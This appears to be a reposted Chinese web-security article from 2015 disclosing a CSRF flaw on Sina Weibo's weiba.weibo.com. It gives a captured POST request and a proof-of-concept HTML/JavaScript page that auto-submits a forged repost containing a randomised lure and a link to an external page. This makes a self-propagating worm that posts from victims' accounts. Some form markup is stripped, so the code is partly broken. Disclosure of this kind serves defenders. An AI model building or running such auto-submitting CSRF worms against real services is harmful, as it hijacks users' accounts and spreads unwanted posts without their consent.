新浪微博首页再来一波蠕虫 - 网站安全

新浪微博首页再来一波蠕虫 - 网站安全 - 自学p

来源：自学PHP网时间：2015-04-17 11:59 作者：阅读:次

[导读] 1.出问题的是这个地方撒！http://weiba.weibo.com2.这个站点几乎没有对CSRF做任何防范，不过加关注刷粉丝的地方除外啊！举两个例子如下：3.首先是支持微博吧的地方，对于微博吧的支持没有...

1.出问题的是这个地方撒！

http://weiba.weibo.com

2.这个站点几乎没有对CSRF做任何防范，不过加关注刷粉丝的地方除外啊！举两个例子如下：

3.首先是支持微博吧的地方，对于微博吧的支持没有防范CSRF，导致可以刷微博吧粉丝，不是刷个人粉丝的地方撒：

构造POC如下：

<html>

<body>

</form>

document.fxx.submit();

</script>

</body>

</html>

4.点击上图【支持一下】后，会有如下转发到微博的请求发出！

5.点击【发布】，抓包查看请求如下：

http://weiba.weibo.com/aj_baropen/share?__rnd=1358845029390

POST /aj_baropen/share?__rnd=1358845029390 HTTP/1.1

Host: weiba.weibo.com

Proxy-Connection: keep-alive

Content-Length: 555

Origin: http://weiba.weibo.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: http://weiba.weibo.com/bar/open/27872?from=repba

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

Cookie: 略

text=#开通微吧#我刚刚投给了 “耽美吧” 1票，支持量达到3000 “耽美吧” 就能开通了，亲！给力支持一下吧~点此投票：http://weiba.weibo.com/bar/open/27872?from=repba&from=0&pid=a753ecd1jw1dzxuipd4hrj&_t=0

6.POST请求的几个参数都好理解，text参数是转发到微博的内容，from参数表示是来自哪里，但是pid参数不能确认，不知道是token还是什么一个指定的id，不过我去掉了是没有关系的。

7.构造如下POC页面：

<html>

<head>

</head>

<body>

</form>

var random=new Array();

random[0]="";

random[1]="有帅哥哦";

random[2]="有萝莉哦";

random[3]="有小清新哦";

random[4]="有女王哦";

random[5]="有御姐哦";

random[6]="有高帅富哦";

random[7]="有女屌丝哦";

random[8]="有美女哦";

random[9]="有苍老师哦";

var num =parseInt(Math.random()*10);

var constr=" follow me! http://xssed.me/csrf/weibo.html";

var sendstr=random[num]+constr;

alert(sendstr);

document.getElementById("content").setAttribute("value",sendstr);

document.fxx.submit();

</script>

</body>

</html>

8.本地chrome浏览器运行，查看返回结果以及微博首页转发情况：

9.IE浏览器登录另一个微博账号，查找到刚才发表的微博，点击链接，同样也发表了一篇微博：

爱丽团购给任意用户绑定任意手机 - 网站安全

Flash应用安全系列[6]--新浪微博蠕虫威胁 - 网站安

子栏目

新浪微博首页再来一波蠕虫 - 网站安全 - 自学p

最新评论

添加评论

更多文章推荐

添加评论